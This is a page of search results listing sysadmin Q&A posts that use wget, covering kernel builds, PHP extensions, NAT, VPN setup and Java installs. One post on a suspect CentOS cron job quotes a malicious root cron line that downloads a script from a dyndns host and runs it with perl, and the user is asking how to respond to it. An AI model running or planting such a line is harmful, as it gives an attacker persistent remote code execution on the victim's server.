Search Results

Search found 593 results on 24 pages for 'wget'.

Page 17 of 24

  • Update OpenSSL in Debian Squeeze

    - by PiTheNumber
    There is this CVE-2014-0224 bug in OpenSSL, so I would like to update my affected version:

        # openssl version
        OpenSSL 0.9.8o 01 Jun 2010

    But there is no update for Squeeze. I read that it is already fixed in squeeze-lts. What am I supposed to do? Will there be a fix for Squeeze, so that I just need to wait? Should I install an OpenSSL update manually? How? I tried to install openssl-0.9.8za and openssl-1.0.1h with wget, ./config, make, make install, but openssl version still reports the same version. I also tried other config parameters, but with those the build fails.
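
    A sketch of the squeeze-lts route, assuming the host can reach a Debian mirror (the mirror URL follows the Debian LTS wiki; the libssl package name is Squeeze's stock one):

        # append the LTS suite to /etc/apt/sources.list
        deb http://http.debian.net/debian squeeze-lts main contrib non-free

        apt-get update
        apt-get install openssl libssl0.9.8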


  • Why is the kernel source not installed?

    - by Subhajit
    I want to install the kernel source on Ubuntu 12.04, where it is not installed. I checked this with the following command:

        dpkg -s kernel

    The output is:

        Kernel is not installed, no information available

    Hence I followed these steps to install it:

    1. Installed the dependencies:

        sudo apt-get install gcc libncurses5-dev git-core kernel-package fakeroot build-essential
        sudo apt-get update && sudo apt-get upgrade

    2. Downloaded the kernel source:

        wget http://www.kernel.org/pub/linux/kernel/v3.x/linux-3.5.tar.bz2
        tar -xvf linux-3.5.tar.bz2
        cd linux-3.5/

    3. Compiled the source code to generate the .deb packages:

        make-kpkg clean
        fakeroot make-kpkg --initrd --append-to-version=-spica kernel_image kernel_headers

    4. Installed the .deb packages (two are generated: one for the kernel headers, one for the kernel image):

        sudo dpkg -i linux-*.deb

    But after a reboot it seems the kernel is not installed (checked with dpkg -s kernel). Please tell me where I am going wrong. Also, in step 3 I believe I built a new kernel (with the -spica suffix), but during boot this new kernel does not show up as an option. Please help me.
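
    One note on the check itself: no Debian or Ubuntu package is literally named "kernel", so dpkg -s kernel reports nothing regardless of what is installed. A sketch of checks that reflect reality (nothing here is specific to this machine):

        # kernel image/header packages actually installed
        dpkg -l 'linux-image*' 'linux-headers*'
        # the kernel currently running
        uname -r
        # a successfully installed -spica build would leave an image here
        ls /boot/vmlinuz-*
        # make-kpkg packages do not always refresh the boot menu themselves
        sudo update-grub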


  • Unable to load the memcache.so extension?

    - by billyduc
    I built PHP from source with this configure command:

        './configure' '--prefix=/usr/local/php-5.2.8' '--with-config-file-path=/etc --with-config-file-scan-dir=/etc/php.d' '--with-apxs2=/usr/local/httpd/bin/apxs' '--with-mysql=/usr/local/mysql/' '--with-zlib'

    I installed the PHP memcache extension:

        wget http://pecl.php.net/get/memcache
        tar -zxvf memcache-2.2.5.tgz
        cd memcache-2.2.5
        phpize
        ./configure --enable-memcache
        make
        make install

    I added this to my /usr/local/lib/php.ini:

        extension=memcache.so

    I restarted Apache and ran php -m, but PHP does not seem to load the memcache extension. I followed the solution from http://www.howtoforge.com/forums/showthread.php?t=26554 and added the full path:

        extension=/usr/local/lib/php/extensions/no-debug-non-zts-20060613/memcache.so

    then restarted Apache, but it still did not load the extension. I have googled around but keep hitting the same issue. How can I load this extension?
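
    One detail worth checking against the configure line above: PHP was built with --with-config-file-path=/etc, so an extension= line in /usr/local/lib/php.ini may simply never be read. A quick diagnostic sketch (paths are illustrative):

        # which php.ini the CLI actually loads, if any
        php --ini
        # where PHP expects shared extensions
        php -i | grep extension_dir
        # confirm the module really landed there
        ls /usr/local/lib/php/extensions/*/memcache.so

    If php --ini points at /etc, moving the extension line into /etc/php.ini (or a file under /etc/php.d) and restarting Apache would be the first thing to try.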


  • Suspect cron job on CentOS 6.5 + Virtualmin: recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root:

        cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc*

    I've tried to download the file, but there is nothing to download. The server is running normally, and other than this entry there are no signs that the box has been compromised. The only thing I can think of is that I recently installed Varnish Cache following a tutorial. Given that I did not enter the cron job myself and nothing else appears to be wrong, what would be the appropriate course of action beyond disabling the cron job?
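
    A first-pass triage sketch for a box in this state (read-only checks, nothing specific to Virtualmin):

        # every crontab on the system, not just root's
        for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null; done
        ls /etc/cron.d/ /var/spool/cron/
        # crontab edits are logged as REPLACE events; when did this one appear?
        grep REPLACE /var/log/cron* | tail
        # listeners and connections you do not recognize
        netstat -tulpn
        # recent logins
        last | head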


  • Keeping a Rackspace virtual server alive

    - by mit
    It appears to me that Rackspace somehow freezes cloud VMs after some idle time. This means the first request to a PHP page takes much longer to respond than subsequent requests. I am currently querying the machine with wget from a different host to keep it "alive", but I wonder what frequency is necessary. Does anyone know the time period after which they send a VM to "sleep"? I would guess it is a few minutes. EDIT: There is no caching involved on the PHP site. It recently moved from another vhost, and there was never such latency on the first request before.
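
    For the probing itself, a minimal cron-based keep-alive sketch on the querying host (the five-minute interval and the URL are assumptions to tune once the idle window is known):

        # crontab entry: fetch a cheap page every 5 minutes, discard the output
        */5 * * * * wget -q -O /dev/null http://example-vm.example.com/ping.php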


  • Building Boost 1.42 on FreeBSD 6.3

    - by Ivan Perekluyev
    Hi, I need to build Mapnik on FreeBSD 6.3, but the port is marked as 'broken', so I am forced to build it from source. With Boost 1.41 (which is in ports), Mapnik doesn't build. Somewhere on the internet I found that Mapnik builds successfully with Boost 1.42, so I downloaded a patch from wiki.freebsd.org/BoostPortingProject and applied it:

        wget http://alexanderchuranov.com/boost-port/boost-from-1.41-to-1.42-2010-02-16-17-11.diff
        cd /usr/ports
        patch -p0 -i ~/boost-from-1.41-to-1.42-2010-02-16-17-11.diff

    After that, I tried to install the boost-all metaport, but it failed:

        cd devel/boost-all
        make install 2>&1 | tee build.log
        tail -n 100 build.log > short_build.log

    Build log (attention, 5 MB!): dl.dropbox.com/u/7365614/build.log
    Short build log: http://paste.pocoo.org/show/224474/
    Thanks!


  • How to configure the openSUSE firewall to redirect local traffic to local ports

    - by Eduard Wirch
    I have openSUSE 11.3 installed and am using the openSUSE firewall configuration mechanism (/etc/sysconfig/SuSEfirewall2). I have an HTTP server application running on port 8080 and want the service to be accessible on port 80, so I created a redirect rule using:

        FW_REDIRECT="0/0,0/0,tcp,80,8080"

    This works fine for every request coming from outside, but it doesn't for local requests (for example, wget http://myserver/ run on the server itself). Is there a way to tell the firewall to redirect local requests addressed to port 80 to port 8080, using the SUSE firewall configuration file?
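
    Background on why the rule only helps external clients: a redirect like this lands in the nat table's PREROUTING chain, which locally generated packets never traverse; they pass through nat OUTPUT instead. A raw iptables sketch of the missing piece (192.0.2.10 is a placeholder for the server's own address, and a rule like this would need SuSEfirewall2's custom-rules hook to survive a firewall reload):

        # redirect locally generated traffic aimed at port 80 to 8080
        iptables -t nat -A OUTPUT -p tcp -d 127.0.0.1 --dport 80 -j REDIRECT --to-ports 8080
        iptables -t nat -A OUTPUT -p tcp -d 192.0.2.10 --dport 80 -j REDIRECT --to-ports 8080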


  • Can't connect to YouTube from a specific network

    - by Tyilo
    On my current network I am unable to connect to http://www.youtube.com/. It doesn't matter which browser I use, or whether I use a CLI tool (wget, curl). The error in Google Chrome:

        Oops! Google Chrome could not connect to www.youtube.com

    The error from curl:

        curl: (7) couldn't connect to host

    If I use nslookup to resolve YouTube, I get 173.194.32.32. If I go to http://173.194.32.32/ in my browser, it connects, but as Google is probably checking the Host HTTP header, it shows Google's front page instead. No websites are blocked on the router, and other devices on the network seem to work. My computer only has this problem on this specific network. I am using Mac OS X 10.8.2 on a MacBook (mid 2009).
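
    A few checks that can narrow down where the connection dies (a sketch; the IP is the one resolved above, and the flush command is the 10.7/10.8-era one):

        # reach the resolved IP while presenting the proper Host header
        curl -v -H "Host: www.youtube.com" http://173.194.32.32/
        # any stale local override?
        grep -i youtube /etc/hosts
        # flush the local DNS cache on OS X 10.8
        sudo killall -HUP mDNSResponder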


  • Help me set up Samba and Apache on my Ubuntu VM from Vista, starting from ping

    - by avastreg
    OK, the title is not so clear after all, so let me describe the problem in a few points:

    - I'm on Windows Vista.
    - I have a VirtualBox Ubuntu 9.04 server (virtual machine) installed in Windows.
    - I'm under Active Directory (maybe that helps), on network 192.168.2.x.

    After the Ubuntu (LAMP) installation, I have:

    - The Ubuntu IP is set to 10.0.2.15 (DHCP).
    - Vista pings Ubuntu and Ubuntu pings Vista (only IPs, not names).
    - I can't connect to Apache (default Ubuntu server install) at http://10.0.2.15/.
    - On Ubuntu itself, testing Apache with wget http://10.0.2.15/ works.

    I tried to set up Samba by writing a share definition, but nothing: I can't access Ubuntu from Vista. My goal is:

    - setting up Samba to work on files from Windows;
    - reaching Apache to test web pages.

    OK, I'm not completely a noob (but I'm on the noob way anyway) and I've tried many solutions, so please try to help me; let's look together at what went wrong :)
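
    One observation that may explain most of this: 10.0.2.15 is the address VirtualBox assigns in NAT mode, and a NAT guest is not directly reachable from the host or the LAN. Two usual ways out, sketched with assumed VM name and ports (on VirtualBox releases predating the --natpf1 option, the same forwarding was configured via VBoxManage setextradata):

        # option 1: bridge the VM onto the 192.168.2.x LAN (VM powered off;
        # the adapter name must match one from `VBoxManage list bridgedifs`)
        VBoxManage modifyvm "Ubuntu904" --nic1 bridged --bridgeadapter1 "Local Area Connection"
        # option 2: keep NAT and forward host ports into the guest
        VBoxManage modifyvm "Ubuntu904" --natpf1 "http,tcp,,8080,,80"
        VBoxManage modifyvm "Ubuntu904" --natpf1 "smb,tcp,,4450,,445"
        # then browse http://localhost:8080/ from Vista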


  • Setting up phpMemCacheAdmin on CentOS 5.5

    - by Bill Smith
    I have been able to set up phpMemCacheAdmin (http://code.google.com/p/phpmemcacheadmin/) on CentOS and am able to view the localhost memcache statistics; however, whenever I add other memcached nodes, the config is never changed. I am fairly certain it has something to do with permissions, but I am unable to track down what exactly needs to be done, or how to do it. The install was pretty straightforward:

        wget http://phpmemcacheadmin.googlecode.com/files/phpMemCacheAdmin-1.1.3r161.tar.gz
        tar xvzf phpMemCacheAdmin-1.1.3r161.tar.gz
        chmod +w Config/Memcache.ini

    But the documentation also states that Apache needs read/write rights in the temp folder (default: Temp/) and the entire config directory (Config/); that is the part I am unsure of. Help!
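
    A sketch of granting those rights, assuming Apache runs as the apache user and the app was unpacked under the web root (both assumptions):

        cd /var/www/html/phpMemCacheAdmin
        # hand the writable directories to the web server user
        chown -R apache:apache Config Temp
        chmod -R u+rw Config Temp
        # if SELinux is enforcing, the directory context matters too
        ls -Zd Config Temp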


  • Is it possible to set up a VPN through Tor and keep software updates working?

    - by moazhmi
    G'day. I have been trying to do a software update on Trusty, both in the terminal and in the Software Updater app, but that has not been successful; apparently my ISP has a broken transparent proxy.

        moazhmi@moazhmi-K52F:~$ wget -S http://extras.ubuntu.com/ubuntu/dists/trusty/InRelease
        --2014-06-04 17:34:52-- http://extras.ubuntu.com/ubuntu/dists/trusty/InRelease
        Resolving extras.ubuntu.com (extras.ubuntu.com)... 91.189.92.152
        Connecting to extras.ubuntu.com (extras.ubuntu.com)|91.189.92.152|:80... connected.
        HTTP request sent, awaiting response...
          HTTP/1.1 200 OK
          Content-Type: text/html; charset=UTF-8
          Content-Length: 213
          Date: Wed, 04 Jun 2014 14:34:52 GMT
          Server: Apache/2.2.22 (Ubuntu)
          Connection: Keep-Alive
          Vary: Accept-Encoding
        Length: 213 [text/html]
        Saving to: ‘InRelease’
        100%[======================================>] 213 --.-K/s in 0s
        2014-06-04 17:34:52 (22.1 MB/s) - ‘InRelease’ saved [213/213]

    I was advised to refer back to the ISP with a complaint, but that returned with peanuts. My question is: is it possible to set up a VPN through Tor, so that I can run software updates from the terminal or the app? Browsing is beside the point here; I need to update, which I am not able to do (it worked on 12.04).
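
    On the Tor idea: apt on 14.04 only speaks HTTP proxies, so the usual sketch interposes a small HTTP-to-SOCKS shim (polipo here) in front of Tor's SOCKS listener on 127.0.0.1:9050. The names and ports below are the packages' defaults, and this assumes package installs themselves still go through:

        sudo apt-get install tor polipo
        # in /etc/polipo/config, point polipo at Tor:
        #   socksParentProxy = "127.0.0.1:9050"
        #   socksProxyType = socks5
        # then route apt through polipo's HTTP proxy (default port 8123)
        echo 'Acquire::http::Proxy "http://127.0.0.1:8123/";' | sudo tee /etc/apt/apt.conf.d/99tor
        sudo apt-get update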


  • Installing JDK 1.7.0 on an Ubuntu 11.04 machine

    - by Yogesh
    I am facing a problem while trying to install Java 7 on Ubuntu. These are the steps I performed:

    1. Downloaded the archive from the link below, which gave me the file jdk-7u1-linux-x64.tar.gz:

        wget http://download.oracle.com/otn-pub/java/jdk/7u1-b08/jdk-7u1-linux-x64.tar.gz

    2. Untarred it and moved it into place:

        tar -xvf jdk-7u1-linux-x64.tar.gz
        sudo mv ./jdk1.7.0_01 /usr/lib/jvm/jdk1.7.0_01

    3. Ran:

        sudo update-alternatives --config java

       which gave the following output:

        There is only one alternative in link group java: /usr/lib/jvm/java-6-sun/jre/bin/java
        Nothing to configure.

    4. Registered the new JDK and configured it (I entered 1 at the prompt):

        sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_01/jre/bin/java 1
        sudo update-alternatives --config java

    5. Ran java -version, which showed the following output:

        java version "1.6.0_26"
        Java(TM) SE Runtime Environment (build 1.6.0_26-b03)
        Java HotSpot(TM) 64-Bit Server VM (build 20.1-b02, mixed mode)

    I am not sure whether JDK 1.7.0 is installed, since it still shows version 1.6.0_26.
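
    A hedged sketch of what usually resolves this: register the JDK with a priority above the existing Java 6 entry (2000 here is an arbitrary high value), explicitly select it, and then verify where the java link actually points:

        sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_01/jre/bin/java 2000
        sudo update-alternatives --config java    # choose the jdk1.7.0_01 entry at the prompt
        readlink -f /usr/bin/java                 # should end in jdk1.7.0_01/jre/bin/java
        java -version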


  • How to get the LAN IP into a variable in a Windows batch file

    - by Ville Koskinen
    I'm streaming audio from my Windows 7 laptop to a sound card attached to a router. I have a little batch script to start streaming:

        REM Kill any instances of vlc
        taskkill /im vlc.exe
        "c:\Program Files\VideoLAN\VLC\vlc.exe" <parameters to start http streaming>
        REM Wait for vlc
        TIMEOUT /T 10
        REM start playback on router
        plink -ssh [email protected] -pw password killall -9 madplay
        plink -ssh [email protected] -pw password wget -q -O - http://192.1.159:8080/audio | madplay -Q --no-tty-control - &

    As you can see, the HTTP stream address is hard-coded. It would be nice to get the address dynamically, to reuse the script on other machines. Any ideas?
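
    One common approach, sketched here: parse the address out of ipconfig. This assumes English Windows output, where the relevant line is labeled "IPv4 Address"; the findstr pattern needs adjusting for other locales:

        @echo off
        REM capture the first IPv4 address into %LANIP%
        for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /c:"IPv4 Address"') do (
            set LANIP=%%a
            goto :gotip
        )
        :gotip
        REM strip the leading space
        set LANIP=%LANIP: =%
        echo http://%LANIP%:8080/audio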


  • mplayer dumpstream sometimes fails

    - by User1
    I'm trying to rip the video at http://videolectures.net/ecml07%5Fgetoor%5Fisr/ so I can play it at a faster speed. If I paste http://193.2.4.216/2007/pascal/ecml07%5Fwarsaw/getoor%5Flise/ecml07%5Fgetoor%5Fisr%5F01.wmv into Firefox on Windows, Media Player plays it. However, if I try mplayer -dumpstream, mplayer gets stuck in an infinite loop trying to play the file. If I use wget to download the link, I get a small text file that basically points to the same URL. How can I get mplayer to download this stream?
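
    That small text file is the tell: the http:// link appears to be a redirector around a Windows Media stream, which Media Player follows silently. A hedged sketch of what often works in this situation is dumping the target over the MMS protocol instead (same host and path, different scheme):

        mplayer -dumpstream -dumpfile lecture.wmv \
            "mms://193.2.4.216/2007/pascal/ecml07_warsaw/getoor_lise/ecml07_getoor_isr_01.wmv"
        # or let mplayer resolve the redirector itself
        mplayer -playlist "http://193.2.4.216/2007/pascal/ecml07_warsaw/getoor_lise/ecml07_getoor_isr_01.wmv" \
            -dumpstream -dumpfile lecture.wmv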


  • How do I install something from source and make it available to root?

    - by pwny
    I have a CentOS VM, and I need to install the latest version of Ruby on it. Unfortunately, yum only makes Ruby 1.8.6 available, so I'm trying to install Ruby from source. Here's what I'm using:

        cd /usr/src
        sudo -s
        wget http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.3-p125.tar.gz
        tar -xvzf ruby-1.9.3-p125.tar.gz
        cd ruby-1.9.3-p125
        ./configure
        make && make install

    The problem is that once that's done, I can only use Ruby as a regular user, but I need to use it as root to install some gems. For example, as a regular user ruby -v works, but sudo ruby -v outputs:

        bash: ruby: command not found

    What am I missing to make software I install from source available to all users?
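
    The likely mechanism: make install drops Ruby into /usr/local/bin, but sudo replaces PATH with the secure_path setting from /etc/sudoers, which on CentOS typically omits /usr/local/bin. A sketch of the two usual fixes (the sudoers line shown is an assumption about the default):

        # one-off: invoke by full path
        sudo /usr/local/bin/ruby -v
        sudo /usr/local/bin/gem install bundler
        # permanent: run visudo and extend secure_path, e.g.
        #   Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin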


  • How to install a custom C library?

    - by arijit
    I just wanted to add a C library to Ubuntu that was created by Harvard for the CS50 course. They provide the following installation instructions:

    Debian, Ubuntu. First become root, as with:

        sudo su -

    Then install the CS50 Library as follows:

        apt-get install gcc
        wget http://mirror.cs50.net/library/c/cs50-library-c-3.1.zip
        unzip cs50-library-c-3.1.zip
        rm -f cs50-library-c-3.1.zip
        cd cs50-library-c-3.1
        gcc -c -ggdb -std=c99 cs50.c -o cs50.o
        ar rcs libcs50.a cs50.o
        chmod 0644 cs50.h libcs50.a
        mkdir -p /usr/local/include
        chmod 0755 /usr/local/include
        mv -f cs50.h /usr/local/include
        mkdir -p /usr/local/lib
        chmod 0755 /usr/local/lib
        mv -f libcs50.a /usr/local/lib
        cd ..
        rm -rf cs50-library-c-3.1

    I did exactly as directed, but the compiler reported "undefined reference" to a function; the function was GetString. So I searched for a solution and found one: use the -l switch. Now when I compile, I use something like (I don't remember the exact command):

        gcc -o hello hello.c -lcs50

    However, I cannot use the make command, which is easier to use. I understand that there is some problem with linking the library. What is a good solution to this problem?
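
    make's built-in rule for a C program appends the LDLIBS variable at link time, which is where -lcs50 belongs. A minimal sketch of both ways to use that (no Makefile is strictly required for a single source file):

        # one-off, no Makefile:
        make hello LDLIBS=-lcs50

        # or a two-line Makefile next to hello.c:
        #   CFLAGS = -ggdb -std=c99
        #   LDLIBS = -lcs50
        # after which a plain `make hello` links correctly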


  • Download a file via HTTP from a script in Windows

    - by Jason R. Coombs
    I want a way to download a file via HTTP given its URL (similar to how wget works). I've seen the answers to this question, but I have two changes to the requirements:

    1. It should run on Windows 7 or later (if it works on Windows XP, that's a bonus).
    2. It has to work on a stock machine with nothing but the script, which should be text that can easily be typed on a keyboard or copy/pasted. The shorter, the better.

    So, essentially, I'd like a .cmd (batch) script, VBScript, or PowerShell script that can accomplish the download. It could use COM or invoke IE, but it needs to run without any input, and it should behave well when invoked without a display (such as through a telnet session).
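
    A minimal PowerShell sketch that fits those constraints on the PowerShell 2.0 a stock Windows 7 ships with (URL and destination are placeholders):

        # download with the stock .NET WebClient; no UI, no extra tools
        (New-Object System.Net.WebClient).DownloadFile('http://example.com/file.zip', 'C:\temp\file.zip')

    The same line is callable from a .cmd script as:

        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/file.zip', 'C:\temp\file.zip')"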


  • Problem with dpkg-preconfigure: how do I correct it?

    - by Eric Wilson
    I was trying to install TeamViewer, and I followed the instructions here even though they specify 11.10 instead of the 12.04 I'm running. In particular, I executed:

        wget http://www.teamviewer.com/download/teamviewer_linux.deb
        sudo dpkg -i teamviewer_linux.deb

    The dpkg command failed, and since then my packaging system has been broken. The Software Center instructs me to try:

        sudo apt-get -f install

    which leads to:

        Reading package lists... Done
        Building dependency tree
        Reading state information... Done
        Correcting dependencies... Done
        The following packages will be REMOVED:
          teamviewer7:i386
        0 upgraded, 0 newly installed, 1 to remove and 17 not upgraded.
        9 not fully installed or removed.
        Need to get 89.0 kB of archives.
        After this operation, 81.9 MB disk space will be freed.
        Do you want to continue [Y/n]? y
        Get:1 http://us.archive.ubuntu.com/ubuntu/ precise/main dash amd64 0.5.7-2ubuntu2 [89.0 kB]
        Fetched 89.0 kB in 1s (83.9 kB/s)
        E: Sub-process /usr/sbin/dpkg-preconfigure --apt || true returned an error code (100)
        E: Failure running script /usr/sbin/dpkg-preconfigure --apt || true

    At this point I'm stumped.
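
    dpkg-preconfigure is shipped by the apt-utils package, and an error code of 100 from it frequently means the script itself is missing or not executable rather than anything TeamViewer-specific; a hedged first check:

        # is the script there and executable?
        ls -l /usr/sbin/dpkg-preconfigure
        # if not, restoring apt-utils usually brings it back
        sudo apt-get install --reinstall apt-utils
        # then retry the repair
        sudo apt-get -f install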


  • Linux servers seeing bad download performance behind Sonicwall firewall

    - by Joshua Penix
    I'm working with a pair of co-located CentOS Linux servers sitting behind a SonicWALL PRO 2040 Enhanced firewall running in transparent bridge mode. These servers have a strange problem downloading files more than a few megabytes in size. For example, if I try to wget or FTP a copy of the Linux kernel from kernel.org, the first 1-2 MB download at 600+ KB/s, and then throughput drops off a cliff to 1 KB/s. I've reviewed all the firewall configuration settings for anything suspicious but found nothing. More interestingly, I performed the same download from a Windows server sitting behind the same firewall, and it sailed right through at 600+ KB/s the whole way. Has anyone seen this? Where should I start looking to troubleshoot this problem?
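
    One pattern that matches these symptoms is the firewall mishandling TCP window scaling: Linux enables window scaling by default, while the older Windows stack does not, which would explain why only the Linux servers stall. A hedged test from one of the CentOS boxes (restore the default afterwards, since disabling scaling hurts throughput on fast links; the download URL is just an example large file):

        # temporarily disable TCP window scaling, then retry the download
        sysctl -w net.ipv4.tcp_window_scaling=0
        wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.30.tar.bz2
        # restore the default
        sysctl -w net.ipv4.tcp_window_scaling=1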


  • Linux + iptables + NAT = some HTTP hosts unreachable

    - by Daniel
    Hi. I've set up dead-simple NAT:

        iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o ppp0 -j MASQUERADE

    Everything works almost OK. Almost. The problem I've experienced is that some hosts are not reachable by the NAT clients. For example, http://code.jquery.com/jquery-1.4.2.min.js: I can download it from the server itself, but on a NAT client the download stalls at the connection stage. I thought it was Firefox's fault, but wget has the same issue. I haven't found any logs or messages that shed light on the situation. Any ideas what's going on? Maybe some tricky sysctl setting is causing this? P.S. 3 out of 3 client boxes are experiencing this issue. This is definitely server trouble.
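
    Selective stalls for NAT clients behind a ppp0 uplink are the textbook path-MTU-discovery symptom: the PPP link's MTU is below 1500, and some destinations never see the ICMP fragmentation-needed replies. The standard remedy is clamping the TCP MSS on forwarded connections, sketched here:

        # clamp MSS to the path MTU for connections leaving via ppp0
        iptables -t mangle -A FORWARD -o ppp0 -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu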


  • apt-get update stuck on "Waiting for Headers"

    - by crasic
    I'm setting up a Maverick server on a spare PC. The install completes fine and the system boots into the shell. However, when I try to do an apt-get update, apt hangs on almost every entry with the message:

        99% [Waiting for headers]

    Sometimes a rate of 96 B/s appears on the far right, and the actual percentage it claims also varies. Searching around online gave a potential solution, the option:

        Acquire::http::Pipeline-Depth="0"

    This somewhat alleviates the problem: it stalls on every other entry with the same message as above. If you wait it out (the whole update took about 4 hours), the update still fails, as a good portion of the hits show "unable to connect" or similar messages, despite the fact that I can ping the servers from the PC just fine.

    The problem is also unrelated to the mirror used, since I've tried about a dozen mirrors with no success. I've even tried commenting out everything but the main entry in sources.list, and it still refuses to update. The network connection is fine, since I can ping and wget (apt won't let me install lynx until I run a successful update) just fine. I've also reinstalled the distro with no luck.

    The only unusual thing about the setup is that the PC connects to the internet through my Windows laptop with ICS configured properly; but as I've said, the network connection is otherwise fine.
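
    Two follow-ups worth trying, sketched: make the pipeline workaround persistent, and probe for the one thing ICS links commonly break, the path MTU (1472 bytes of payload plus 28 bytes of headers corresponds to a 1500-byte MTU):

        # persist the no-pipelining option
        echo 'Acquire::http::Pipeline-Depth "0";' | sudo tee /etc/apt/apt.conf.d/99no-pipeline
        # test whether full-size packets survive the ICS hop
        ping -M do -s 1472 archive.ubuntu.com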


  • How do I modify these VPN connection settings for Xfce?

    - by Dave M G
    I have signed up for a VPN (virtual private network) service, and I configured it on my computer running GNOME Classic with the following instructions:

    1. In a terminal, install the OpenVPN packages with sudo apt-get install network-manager-openvpn.
    2. Restart the network manager with sudo restart network-manager.
    3. Run sudo wget https://www.xxxxxxx.com/ovpnconfigure.zip.
    4. Extract the files from the zip with unzip ovpnconfigure.zip.
    5. Move cert.crt to /etc/openvpn.
    6. Open the Network Manager on the menu bar.
    7. Choose Add, select the OpenVPN connection type, and click Create.
    8. Enter Private Internet Access SSL for the connection name.
    9. Enter xxxxxx.xxxxxxxx.com for the gateway.
    10. Select Password and enter your login credentials.
    11. Browse for and select the CA certificate extracted in step 4.
    12. Choose Advanced and enable LZO compression.
    13. Apply and exit.
    14. Connect using the Network Manager.

    It worked, but now I want to set up access to the same VPN service on another machine that runs Mythbuntu, which uses Xfce as its desktop manager, so every point from 6 on doesn't apply. How can I modify the instructions above so that I can get my VPN service working with Xfce? A further note: while I can access the Xfce desktop directly if I need to, it's more convenient for me to access the machine over SSH from one of my other computers, so a command-line process would be ideal. (I looked for this, and found instructions only for PPTP access, whereas I need OpenVPN.)
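
    Since only the Network Manager applet is desktop-specific, a command-line sketch that reproduces steps 6 through 14 with plain openvpn (the gateway, port, and file names are placeholders following the pattern above):

        sudo apt-get install openvpn
        # /etc/openvpn/pia.conf, a minimal client config (values assumed):
        #   client
        #   dev tun
        #   proto udp
        #   remote xxxxxx.xxxxxxxx.com 1194
        #   ca /etc/openvpn/cert.crt
        #   auth-user-pass /etc/openvpn/login.txt   # username on line 1, password on line 2
        #   comp-lzo
        #   persist-key
        #   persist-tun
        sudo openvpn --config /etc/openvpn/pia.conf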


  • Oh snap! My RPi was upgraded to 512MB! Woo-hoo!

    - by hinkmond
    I ordered a Raspberry Pi Model B (256MB) over 4 months ago on backorder. When it finally came, I saw it had been upgraded to the new half-a-gig model! Woot! But, all was not perfect. Gary C. told me the shipped configuration of the new RPi models didn't have the right firmware for 512MB, and I had to upgrade the start.elf in the /boot directory to recognize all of the 512MB RAM. I did a "free" command, and sure enough saw only 240MB. Sadness. But Gary gave me a copy of his start.elf, which worked after some trial and error. For anyone ordering the new RPi Model B w/512MB, here are the steps to get you going with the full 512MB RAM:

        sudo apt-get update --fix-missing
        # NOTE: This step takes at least a couple hours on a fast network
        sudo apt-get upgrade --fix-missing
        wget https://raw.github.com/raspberrypi/firmware/164b0fe2b3b56081c7510df93bc1440aebe45f7e/boot/arm496_start.elf
        sudo mv /boot/start.elf /boot/orig-start.elf
        sudo mv arm496_start.elf /boot/start.elf
        sudo reboot

    Afterwards, free reports:

        free
                     total       used       free     shared    buffers     cached
        Mem:        497768     210596     287172          0      16892     169624
        -/+ buffers/cache:      24080     473688
        Swap:       102396          0     102396

    So of course this means... (drumroll) there is now 498MB available for the Java Embedded heap!

        java -Xmx400m -version
        java version "1.7.0_06"
        Java(TM) SE Embedded Runtime Environment (build 1.7.0_06-b24, headless)
        Java HotSpot(TM) Embedded Client VM (build 23.2-b09, mixed mode)

    Yeah, baby!
    Hinkmond


  • How can I enable readline for PHP 5.4 on Ubuntu 11.10?

    - by dotweb
    I installed PHP 5.4 on my Ubuntu 11.10 PC like this:

        sudo add-apt-repository ppa:ondrej/php5
        sudo apt-get update
        sudo apt-get install php5

    It's working fine, but I no longer have the readline function that I need for my PHP CLI scripts. libreadline-dev is installed, and readline was working perfectly in 5.3. I also tried to compile 5.4 with readline:

        wget http://de2.php.net/get/php-5.4.0.tar.gz/from/de.php.net/mirror
        tar xzvf mirror
        cd php-5.4.0/
        ./configure --with-readline
        make test

    But the last command reported this error after compiling for some minutes:

        FAILED TEST SUMMARY
        Test 7: DTD tests [ext/dom/tests/dom007.phpt]
        You may have found a problem in PHP.

    I appreciate any help getting readline working!
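
    For what it's worth, a single failing DOM test does not prevent installing the build; make test only runs the test suite. A hedged continuation of the source route (note that a bare make install would shadow or conflict with the packaged PHP unless a --prefix is chosen):

        make
        sudo make install
        # confirm readline made it in
        php -m | grep readline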


  • Ubuntu One, compressed files

    - by user8179
    I have uploaded some files to my Ubuntu One account, and it seems to work great most of the time. I usually upload them directly from Nautilus by right-clicking the folder, using the "Synchronize this folder" option, and then making sure the file I want to upload is published. Then I usually test the whole thing by trying to download it: I right-click the file again to get its URL and paste it into my web browser. This usually works fine.

    But yesterday I uploaded two compressed files (.tar.bz2). When I tried to open them after downloading them with my web browser (Opera), it failed. I found that the file was bigger than the original (2358 B instead of 2335 B: 15 B added at the beginning of the file and 8 B added at the end), and someone on the Opera channel (IRC) at OperaNet (Europe) figured out that the reason for this is that the server compresses the file again, "without telling Opera". So to be able to extract the file, I need to add ".gz" to the file name and then extract it twice. If I download it with Firefox, however, I don't need to do that, so maybe Firefox figures this out somehow in a way that Opera does not. Someone also tried to download the file with wget and some other browser, and he also got the same result as I did with Opera; that is, the file is compressed a second time by the server. I guess "the server" is the Ubuntu One server, right?

    So why is this? Could it be done better somehow? Or did I do something wrong when uploading the files? It also seems this extra compression does not always happen: when I tried again a few minutes ago, the file came down at its right size (2335 B) without the extra compression, but the other file (114 MiB) was still compressed twice.
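
    The sizes are a strong hint: the 8 bytes at the end match a gzip trailer, so the download is arriving with an extra Content-Encoding: gzip layer that Firefox undoes transparently and Opera (and wget) do not. A sketch of confirming and working around it from the command line (the URL is a placeholder for the published file's address):

        # does the server declare a second compression layer?
        curl -sI http://ubuntuone.com/p/XXXX/ | grep -i content-encoding
        # ask the server for the bytes as-is
        wget --header='Accept-Encoding: identity' http://ubuntuone.com/p/XXXX/
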